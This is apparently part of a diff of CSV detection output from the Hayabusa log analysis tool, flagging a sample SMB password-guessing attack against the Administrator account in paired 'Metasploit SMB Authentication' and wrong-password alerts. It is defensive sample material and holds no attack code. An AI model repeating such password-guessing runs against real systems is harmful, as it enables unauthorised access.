+2016-09-20 01:50:27.772 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:27.812 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: eO6c2PDl7zVBGzPi  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:27.812 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:27.848 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 1ONnDOs16EnBkdFv  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:27.848 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:27.897 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: aTHHCX9EoKRY4zhR  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:27.897 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:27.939 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: f1jhH08oLzpONDpa  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:27.939 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:27.976 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: o2YK7zc7Ne9c8txA  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:27.976 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:28.013 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 86CrOo9CFreIzSM5  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:28.013 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:28.056 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 0X9UEojEnc350xPc  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:28.056 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:28.096 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 9g3PO3jofnySl92G  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:28.096 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:28.176 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 5TRndfQmPYuhV0Ri  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:28.176 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:28.204 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: yyJOdaks4B1sKMDv  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:28.204 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:28.252 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: IB3OSmcFx5TUiiJX  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:28.252 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:28.309 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: lo3Ex40dkIeO53HF  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:28.309 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:28.352 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: AkzDG8QOM2cxbokF  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:28.352 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:28.395 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: YoMf36ZXJBLnYxtc  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:28.395 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:28.436 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 5izPIefHqDDWNDlu  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:28.436 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:28.476 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: z9o4f1XvvcVXBNwL  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:28.476 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:28.521 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: IjCR48ZJFyEhzrYI  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:28.521 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:28.556 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: mUV9i4O2gapcC01d  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:28.556 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:28.608 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: XJzGAMQCvJBFOUPq  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:28.608 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:28.645 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Fyyu0x6I29R2J10Y  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:28.645 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:28.687 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 8lCe1shqSs0xNwAJ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:28.687 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:28.728 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ipZAMvm56d5mE9Fc  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:28.728 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:28.774 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: XX9N7jodTuEYBCSE  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:28.774 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:28.814 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: h5DBFGpzfJJ7gYV1  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:28.814 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:28.848 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: fQ3qTwcWkXJDuXDI  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:28.848 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:28.889 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: TOfkvLSo2HuhMtvk  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:28.889 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:28.940 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: y9DQUhPQHvvwAO0C  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:28.940 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:28.990 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: yao1JM0tSFv5IHnL  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:28.990 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:29.037 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: NXGm63wiZz3ZYFb9  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:29.037 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:29.077 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: izvPgZCO2GRVLhId  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:29.077 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:29.119 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: iI9zO2o7jd922pfK  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:29.119 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:29.164 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: UnAGy86My6hVwt4J  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:29.164 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:29.208 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: HhFTzONSVEziRtgq  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:29.208 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:29.251 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: QdEv4ooC8AApqU1T  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:29.251 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:29.292 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: TxFGRBKVK732Aeu4  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:29.292 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:29.336 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ITg8QH90LKkAQMLL  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:29.336 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:29.377 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: E8YKCN2uxmJtYxdW  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:29.377 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:29.411 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: lcVIqrTQbNLFW7Cr  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:29.411 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:29.449 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: taZx68l1ci0i2XB0  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:29.449 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:29.487 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 9Jjy0gZhZCc9dVGd  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:29.487 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:29.525 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: S1DxOWcNytmxHfxl  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:29.525 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:29.555 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: JGRFWos3MJeQ0oAr  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:29.555 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:29.593 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: I3YXVTiQAGbf57TH  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:29.593 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:29.629 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: eWNsBwoGd36krY2U  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:29.629 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:29.668 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: HIobpWCoOHdD76lL  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:29.668 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
